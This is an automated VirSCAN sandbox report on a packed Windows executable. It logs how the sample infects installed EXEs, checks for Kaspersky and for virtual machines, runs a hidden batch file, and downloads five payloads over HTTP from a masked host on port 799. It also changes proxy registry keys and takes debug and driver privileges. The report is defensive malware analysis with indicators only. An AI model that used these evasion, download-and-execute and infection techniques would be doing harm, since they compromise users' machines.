VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Language
Server load
Server Load

File information
Safety rating:20
Behavior list
Basic Information
MD5:3a1758b797d6438047e7e03883f430b5
file type:EXE
Production company:
version:1.0.0.1---1, 0, 0, 1
Shell or compiler information:PACKER:UPolyX v0.5
Key behavior
Behavior description:修改原系统的EXE文件
details:C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
C:\Program Files\e\sdk\tools\resym.exe
C:\Program Files\e\setup\mksetup.exe
C:\Program Files\e\setup\setup.exe
C:\Program Files\e\setup\setup_jt.exe
C:\Program Files\e\tools\about.exe
C:\Program Files\e\tools\dbcnv.exe
C:\Program Files\e\tools\dblang.exe
C:\Program Files\e\tools\DBManager.exe
C:\Program Files\e\tools\echo.exe
C:\Program Files\e\tools\egrid.exe
C:\Program Files\e\tools\elib.exe
C:\Program Files\e\tools\EvaDesigner.exe
Behavior description:调用特殊系统函数
details:N/A
Behavior description:在系统目录释放敏感文件
details:C:\WINDOWS\system32\c_31892.nls
Behavior description:对比可疑进程名
details:lstrcmpiA: avp.exe <------> [System Process] Des: 卡巴斯基
lstrcmpiA: avp.exe <------> System Des: 卡巴斯基
lstrcmpiA: avp.exe <------> smss.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> csrss.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> winlogon.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> services.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> lsass.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> RFcxService.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> xwocthlp.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> svchost.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> spoolsv.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> jqs.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> RQCpgradeHelper.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> alg.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> explorer.exe Des: 卡巴斯基
Behavior description:搜索可疑进程名
details:strstr: avp.exe <------> Des: 卡巴斯基
Behavior description:设置特殊文件夹属性
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:查找文件方式探测虚拟机
details:FindFirstFileEx: FileName = C:\Program Files\Oracle\VirtualBox Guest Additions\*
FindFirstFileEx: FileName = C:\Program Files\VMware\*
Process behavior
Behavior description:隐藏窗口创建进程
details:ImagePath = , CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.bat"
Behavior description:创建进程
details:[0x00000c40]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.bat" "
Behavior description:创建新文件进程
details:[0x00000a70]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdtjpw.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdtjpw.exe
Behavior description:创建下载文件进程
details:[0x00000b14]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2D357B6E.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2D357B6E.exe
[0x00000b3c]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7BB51BC3.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7BB51BC3.exe
[0x00000b44]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\36D27321.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\36D27321.exe
[0x00000b5c]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2FCD1ED0.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2FCD1ED0.exe
[0x00000b74]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2AAB365E.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2AAB365E.exe
Behavior description:创建本地线程
details:TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2680, StartAddress = 00401099, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2684, StartAddress = 00402B8C, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2688, StartAddress = 00402B7D, Parameter = 005C3A43
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2692, StartAddress = 00402B7D, Parameter = 005C3A44
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2696, StartAddress = 00402B7D, Parameter = 005C3A58
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2716, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2792, StartAddress = 7C947EBB, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2796, StartAddress = 7C930230, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 3096, StartAddress = 00402845, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 3132, StartAddress = 765E964D, Parameter = 001C4730
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2648, ThreadID = 3308, StartAddress = 77C0A341, Parameter = 003F3EC0
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2648, ThreadID = 3328, StartAddress = 77C0A341, Parameter = 003F3F50
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2648, ThreadID = 3332, StartAddress = 77C0A341, Parameter = 003F3F50
Behavior description:枚举进程
details:N/A
File behavior
Behavior description:创建文件
details:C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k1[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k2[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k3[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k4[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k5[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.bat
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe
Behavior description:修改原系统的EXE文件
details:C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
C:\Program Files\e\sdk\tools\resym.exe
C:\Program Files\e\setup\mksetup.exe
C:\Program Files\e\setup\setup.exe
C:\Program Files\e\setup\setup_jt.exe
C:\Program Files\e\tools\about.exe
C:\Program Files\e\tools\dbcnv.exe
C:\Program Files\e\tools\dblang.exe
C:\Program Files\e\tools\DBManager.exe
C:\Program Files\e\tools\echo.exe
C:\Program Files\e\tools\egrid.exe
C:\Program Files\e\tools\elib.exe
C:\Program Files\e\tools\EvaDesigner.exe
Behavior description:创建可执行文件
details:C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe
Behavior description:修改脚本文件
details:C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.bat ---> Offset = 0
Behavior description:复制文件
details:C:\Program Files\WinRAR\Rar.exe ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.exe
Behavior description:内存映射方式修改可执行文件
details:C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
C:\Program Files\e\sdk\tools\resym.exe
C:\Program Files\e\setup\mksetup.exe
C:\Program Files\e\setup\setup.exe
C:\Program Files\e\setup\setup_jt.exe
C:\Program Files\e\tools\about.exe
C:\Program Files\e\tools\dbcnv.exe
C:\Program Files\e\tools\dblang.exe
C:\Program Files\e\tools\DBManager.exe
C:\Program Files\e\tools\echo.exe
C:\Program Files\e\tools\egrid.exe
C:\Program Files\e\tools\elib.exe
C:\Program Files\e\tools\EvaDesigner.exe
Behavior description:删除文件
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k1[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k2[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k3[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k4[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k5[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe
Behavior description:查找文件
details:FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdtjpw.exe
FileName = C:\*
FileName = C:\222c25ed\*
FileName = C:\222c25ed\IE8-Setup-Full\*
FileName = D:\*
FileName = X:\*
FileName = C:\222c25ed\IE8-Setup-Full\log\*
FileName = C:\AnalyzeControl\*
FileName = C:\DiskD\*
FileName = C:\DiskX\*
FileName = C:\EasyWebSvr\*
Behavior description:在系统目录释放敏感文件
details:C:\WINDOWS\system32\c_31892.nls
Behavior description:设置特殊文件夹属性
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:修改文件内容
details:C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe ---> Offset = 0
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 258048
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 258673
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 0
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 262144
C:\Program Files\e\e.exe ---> Offset = 1970176
C:\Program Files\e\e.exe ---> Offset = 1970801
C:\Program Files\e\e.exe ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe ---> Offset = 0
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 24576
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 25201
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 0
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 28672
C:\Program Files\e\sdk\tools\resym.exe ---> Offset = 126976
Network behavior
Behavior description:下载文件
details:URLDownloadToFileW: http://dd****et:799/cj//k1.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2D357B6E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe
URLDownloadToFileW: http://dd****et:799/cj//k2.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7BB51BC3.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe
URLDownloadToFileW: http://dd****et:799/cj//k3.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\36D27321.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe
URLDownloadToFileW: http://dd****et:799/cj//k4.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2FCD1ED0.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe
URLDownloadToFileW: http://dd****et:799/cj//k5.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2AAB365E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe
Behavior description:连接指定站点
details:InternetConnectA: ServerName = dd****et, PORT = 799, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
Behavior description:打开HTTP连接
details:InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004
Behavior description:建立到一个指定的套接字连接
details:URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x00000284
URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x000002a4
URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x0000029c
URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x0000028c
IP: **.0.0.**:8000, SOCKET = 0x0000010c
Behavior description:读取网络文件
details:hFile = 0x00cc000c, BytesToRead =2048, BytesRead = 2048.
Behavior description:发送HTTP包
details:GET /cj//k1.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k2.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k3.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k4.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k5.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
Behavior description:打开HTTP请求
details:HttpOpenRequestA: dd****et:799/cj//k1.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k2.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k3.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k4.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k5.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
Behavior description:按名称获取主机地址
details:GetAddrInfoW: dd****et
Registry behavior
Behavior description:修改注册表
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
\REGISTRY\MACHINE\SOFTWARE\GTplus\Time
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.bat
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\x\ConnectGroup
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\x\MarkTime
\REGISTRY\USER\S-*\Software\Microsoft\ActiveMovie\devenum\Version
Behavior description:删除注册表键值
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Other behavior
Behavior description:调用特殊系统函数
details:N/A
Behavior description:创建互斥体
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
RasPbFile
127.0.0.1:8000
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-*
Behavior description:创建事件对象
details:EventName = DINPUTWINMM
EventName = Global\userenv: User Profile setup event
EventName = Global\crypt32LogoffEvent
Behavior description:对比可疑进程名
details:lstrcmpiA: avp.exe <------> [System Process] Des: 卡巴斯基
lstrcmpiA: avp.exe <------> System Des: 卡巴斯基
lstrcmpiA: avp.exe <------> smss.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> csrss.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> winlogon.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> services.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> lsass.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> RFcxService.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> xwocthlp.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> svchost.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> spoolsv.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> jqs.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> RQCpgradeHelper.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> alg.exe Des: 卡巴斯基
lstrcmpiA: avp.exe <------> explorer.exe Des: 卡巴斯基
Behavior description:修改后的可执行文件MD5
details:C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> 0dde047d9c26e8035bd96d411006ad39
C:\Program Files\e\e.exe ---> 8d533455307b9e64fda610a234db28e0
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> 8160b1d33edc45c73cc512b7b8e190fe
C:\Program Files\e\sdk\tools\resym.exe ---> 8931220f2b21dc14a4ee888242847525
C:\Program Files\e\setup\mksetup.exe ---> 7ee5b4159e3e5661e772c7c67afadc71
C:\Program Files\e\setup\setup.exe ---> 24b120da1e6979966323a9b6f58d5bae
C:\Program Files\e\setup\setup_jt.exe ---> a0a4a6ef7536d682155422f77070312f
C:\Program Files\e\tools\about.exe ---> fe99f6c80efaf540ad9025747b7c7ccf
C:\Program Files\e\tools\dbcnv.exe ---> 8e13bd96d8e2ca3ff29d141504024833
C:\Program Files\e\tools\dblang.exe ---> 7c4b4b2739e9ad1b941c88d972c1b329
C:\Program Files\e\tools\DBManager.exe ---> f03e9bfe6d864fb303870de28c44eae8
C:\Program Files\e\tools\echo.exe ---> 8ce96ee1f5b6ff8369c7b30c9e411c0f
C:\Program Files\e\tools\egrid.exe ---> 0088810676e9c7e4931ba15331d24815
C:\Program Files\e\tools\elib.exe ---> 97bdd2554097cc5a6103137cb304e0a0
C:\Program Files\e\tools\EvaDesigner.exe ---> 0079df2a8ca1b9ac97099a033eb1ba8a
Behavior description:调整进程token权限
details:SE_DEBUG_PRIVILEGE
SE_LOAD_DRIVER_PRIVILEGE
Behavior description:打开事件
details:HookSwitchHookEnabledEvent
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\SvcctrlStartEvent_A3752DX
\INSTALLATION_SECURITY_HOLD
_fCanRegisterWithShellService
Global\crypt32LogoffEvent
Behavior description:修改后的可执行文件签名信息
details:C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe(签名验证: 未通过)
C:\Program Files\e\e.exe(签名验证: 未通过)
C:\Program Files\e\sdk\cpp\tools\guidgen.exe(签名验证: 未通过)
C:\Program Files\e\sdk\tools\resym.exe(签名验证: 未通过)
C:\Program Files\e\setup\mksetup.exe(签名验证: 未通过)
C:\Program Files\e\setup\setup.exe(签名验证: 未通过)
C:\Program Files\e\setup\setup_jt.exe(签名验证: 未通过)
C:\Program Files\e\tools\about.exe(签名验证: 未通过)
C:\Program Files\e\tools\dbcnv.exe(签名验证: 未通过)
C:\Program Files\e\tools\dblang.exe(签名验证: 未通过)
C:\Program Files\e\tools\DBManager.exe(签名验证: 未通过)
C:\Program Files\e\tools\echo.exe(签名验证: 未通过)
C:\Program Files\e\tools\egrid.exe(签名验证: 未通过)
C:\Program Files\e\tools\elib.exe(签名验证: 未通过)
C:\Program Files\e\tools\EvaDesigner.exe(签名验证: 未通过)
Behavior description:可执行文件签名信息
details:C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe(签名验证: 未通过)
Behavior description:调用Sleep函数
details:[1]: MilliSeconds = 0.
[2]: MilliSeconds = 0.
[3]: MilliSeconds = 0.
[4]: MilliSeconds = 0.
[5]: MilliSeconds = 0.
[6]: MilliSeconds = 0.
[7]: MilliSeconds = 0.
[8]: MilliSeconds = 0.
[9]: MilliSeconds = 0.
[10]: MilliSeconds = 0.
Behavior description:可执行文件MD5
details:C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe ---> 56b2c3810dba2e939a8bb9fa36d3cf96
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe ---> 4dac39e91c9f7cd67510f7e1e1d5decd
Behavior description:打开互斥体
details:DBWinMutex
Local\!IETld!Mutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
Behavior description:搜索可疑进程名
details:strstr: avp.exe <------> Des: 卡巴斯基
Behavior description:查找文件方式探测虚拟机
details:FindFirstFileEx: FileName = C:\Program Files\Oracle\VirtualBox Guest Additions\*
FindFirstFileEx: FileName = C:\Program Files\VMware\*
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
Translated by Keith Miller, United States
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号